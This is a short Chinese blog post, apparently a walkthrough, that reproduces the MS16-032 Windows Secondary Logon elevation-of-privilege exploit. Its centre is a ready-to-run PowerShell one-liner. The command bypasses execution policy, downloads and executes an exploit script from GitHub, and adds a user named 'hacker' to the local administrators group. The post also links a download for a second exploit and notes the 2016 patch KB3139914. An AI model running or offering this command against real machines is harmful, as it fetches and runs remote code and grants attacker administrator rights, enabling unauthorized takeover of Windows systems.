MS16-032 漏洞复现

exploit-db的详情:  https://www.exploit-db.com/exploits/39574/

Windows: Secondary Logon Standard Handles Missing Sanitization EoP
Platform: Windows 8.1, Windows 10, not testing on Windows 7
Class: Elevation of Privilege

0x01使用标准用户登陆win7,下图是当前登录用户abc的详细信息。

0x02直接执行命令进行提权,简单粗暴

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators hacker /add'"

0x03下面就是见证奇迹的时刻了

该漏洞危害十分严重,如图在2008server上测试

本地测试如图,被安全软件检测到。

微软官方在2016年3月8日发布了补丁KB3139914。

附上利用提取文件下载地址https://github.com/hexx0r/CVE-2016-0051

记得旧文章 便是新举子
原文地址:https://www.cnblogs.com/NBeveryday/p/6196611.html